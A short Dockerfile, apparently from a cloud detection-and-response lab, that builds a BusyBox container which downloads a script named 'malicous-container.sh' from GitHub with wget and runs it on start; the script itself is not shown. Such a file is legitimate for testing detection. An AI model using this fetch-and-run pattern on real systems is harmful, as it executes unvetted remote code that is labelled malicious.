# Use the BusyBox base image
FROM busybox:latest

# Create a working directory for script execution
WORKDIR /tmp/

# Use wget (available in BusyBox) to download the script during runtime
RUN wget -O /tmp/malicous-container.sh https://raw.githubusercontent.com/hankthebldr/xsiam-prisma-cdr-lab/alpha/1.0/malicous-container/malicous-container.sh

# Make the script executable
RUN chmod +x /tmp/malicous-container.sh

# Run the script using BusyBox's shell
CMD ["/bin/sh", "/tmp/malicous-container.sh"]
